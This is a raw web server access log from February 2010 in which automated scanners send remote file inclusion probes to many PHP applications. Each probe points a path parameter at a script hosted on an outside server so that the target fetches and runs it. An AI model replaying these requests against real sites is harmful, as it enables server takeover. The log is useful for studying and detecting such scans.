58.230.162.220 - - [14/Feb/2010:09:15:23 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:15:23 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:15:32 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:15:34 -0800] "GET //e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:15:34 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:15:34 -0800] "GET /logs/access_100114.log%20%20/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:15:39 -0800] "GET /logs/access_100112.log%20%20///e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:15:57 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:09:16:03 -0800] "GET /logs/access_100123.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:16:10 -0800] "GET /logs/access_100115.log%20%20///e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:16:37 -0800] "GET /addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:16:37 -0800] "GET /logs/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:16:37 -0800] "GET /logs/access_100112.log%20%20/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:16:38 -0800] "GET /logs/access_100109.log%20%20/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:17:23 -0800] "GET //e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:17:23 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:17:54 -0800] "GET /logs/access_100115.log%20%20///e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:18:34 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:18:34 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:18:35 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:18:36 -0800] "GET /logs/access_100114.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:20:18 -0800] "GET /logs/main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:20:18 -0800] "GET /logs/access_100118.log%20%20/main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:20:18 -0800] "GET /main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:20:49 -0800] "GET /logs/access_100114.log%20%20/main.php?x=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:20:55 -0800] "GET /logs/access_100107.log%20%20/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:21:01 -0800] "GET /logs/access_100120.log%20%20/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [14/Feb/2010:09:21:13 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www1.goldping.com/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [14/Feb/2010:09:21:13 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://www1.goldping.com/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [14/Feb/2010:09:21:13 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www1.goldping.com/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:21:27 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:21:27 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:21:27 -0800] "GET /logs/access_100115.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:21:33 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:21:33 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:21:33 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [14/Feb/2010:09:21:46 -0800] "GET /logs/access_100104.log//modules/vwar/admin/admin.php?vwar_root=http://www1.goldping.com/bbs/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:22:01 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:22:01 -0800] "GET /logs/access_100104.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:22:01 -0800] "GET /logs/access_100129.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:22:01 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:09:23:03 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:23:24 -0800] "GET /logs/access_100107.log%20%20/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:23:31 -0800] "GET /logs/access_100120.log%20%20/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:23:40 -0800] "GET /logs/access_100107.log%20%20/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:23:45 -0800] "GET /logs/access_100120.log%20%20/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [14/Feb/2010:09:24:08 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
213.239.230.130 - - [14/Feb/2010:09:24:08 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:24:11 -0800] "GET /OpenCard.html//?_SERVER%5BDOCUMENT_ROOT=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:24:11 -0800] "GET /logs/access_100126.log%20%20//OpenCard.html//?_SERVER%5BDOCUMENT_ROOT=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:24:11 -0800] "GET /logs//OpenCard.html//?_SERVER%5BDOCUMENT_ROOT=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:14 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:14 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:14 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:15 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:15 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:15 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:09:24:39 -0800] "GET /logs/main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:09:24:39 -0800] "GET /main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:09:24:39 -0800] "GET /logs/access_100118.log%20%20/main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:51 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:51 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:51 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:59 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:24:59 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:25:00 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:09:25:14 -0800] "GET /logs/access_100114.log%20%20/main.php?x=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:25:26 -0800] "GET /OpenCard.html//?_SERVER%5BDOCUMENT_ROOT=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:25:26 -0800] "GET /logs/access_100126.log%20%20//OpenCard.html//?_SERVER%5BDOCUMENT_ROOT=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:25:27 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:25:27 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:25:27 -0800] "GET /logs/access_100115.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:25:31 -0800] "GET /logs//OpenCard.html//?_SERVER%5BDOCUMENT_ROOT=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:25:35 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:25:35 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:25:35 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:25:43 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:25:44 -0800] "GET /logs/access_100125.log/components/com_facileforms/facileforms.frame.php?ff_compath=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:09:25:44 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:25:45 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:25:45 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:25:55 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:25:56 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:25:58 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:26:10 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:26:10 -0800] "GET /logs/access_100112.log/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:26:10 -0800] "GET /logs/access_100109.log/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:09:26:39 -0800] "GET /delete_comment.php?board_skin_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:09:26:39 -0800] "GET /logs/delete_comment.php?board_skin_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:09:26:39 -0800] "GET /logs/access_100109.log/delete_comment.php?board_skin_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [14/Feb/2010:09:27:14 -0800] "GET /logs/access_100205.log/delete_comment.php?board_skin_path=http://www.sinhan.net/zeroboard41/data/board/1212008689/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:28:01 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:28:01 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:28:01 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:28:20 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:28:20 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:28:20 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:37 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:37 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:37 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:40 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:40 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:40 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:42 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:43 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:28:43 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:28:55 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:28:55 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.161.132 - - [14/Feb/2010:09:28:55 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:28:58 -0800] "GET ////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:28:58 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:28:58 -0800] "GET /logs/access_100202.log/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [14/Feb/2010:09:28:58 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
213.239.230.130 - - [14/Feb/2010:09:28:58 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:29:03 -0800] "GET /logs/?custompluginfile[]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:29:04 -0800] "GET /?custompluginfile[]=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
